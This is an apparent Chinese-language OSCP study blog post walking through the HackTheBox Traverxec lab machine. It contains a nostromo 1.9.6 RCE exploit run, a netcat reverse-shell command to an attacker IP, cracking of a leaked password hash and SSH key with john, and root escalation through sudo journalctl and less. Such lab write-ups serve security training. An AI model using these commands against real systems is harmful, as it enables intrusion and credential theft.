OSCP备考_0x24_HackThBox靶机_Linux_Traverxec

Ethan医生4个月前靶场117

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.21.112 (扫描TCP)

image.png





nmap -sU --top-ports 100 10.129.21.112 (扫描UDP)

image.png


然后看扫描结果发现

nostromo 1.9.6

image.png

执行RCE

python2.7 47837.py 10.129.21.112 80 whoami

image.png


python2.7 47837.py 10.129.21.112 80 "nc 10.10.16.31 3333 -e /bin/bash"


image.png

发现目录下有密钥,

image.png


david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

使用john直接进行爆破

image.png

Nowonly4me

尝试切换看看 还是没法登入

cd nostromo/conf/nhttpd.conf

image.png


cd /home/david/public_www


image.png

image.png

有个tgz包

image.png

  1. cp backup-ssh-identity-files.tgz /tmp

  1. tar -zxvf backup-ssh-identity-files.tgz

ssh2john id-rsa > te

cat te 

image.png

john te --wordlist=/usr/share/wordlists/rockyou.txt 

image.png

hunter登入后

image.png

image.png

发现最后一行用sudo(root权限)执行了一个journalctl命令。
关于该命令的说明:journalctl 用来查询 systemd-journald 服务收集到的日志。systemd-journald 服务是 systemd init 系统提供的收集系统日志的服务。
然后执行以下命令。


  1. /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/less

然后输入!sh进入命令模式

在这里插入图片描述

标签: OSCP

相关文章

HTB.OSCP一招网络问题解决

HTB.OSCP一招网络问题解决

刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议 如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.143.34 (扫描TCP)nmap -sU --top-ports 100 10.129...

OSCP备考_0x23_HackThBox靶机_Linux_mango

OSCP备考_0x23_HackThBox靶机_Linux_mango

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.108.26 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

名称说明靶机下载链接https://www.vulnhub.com/entry/sickos-11,132/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

名称说明靶机下载链接https://www.vulnhub.com/entry/digitalworldlocal-torment,299/攻击机(kali)ip:192.168.233.168靶机(...

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。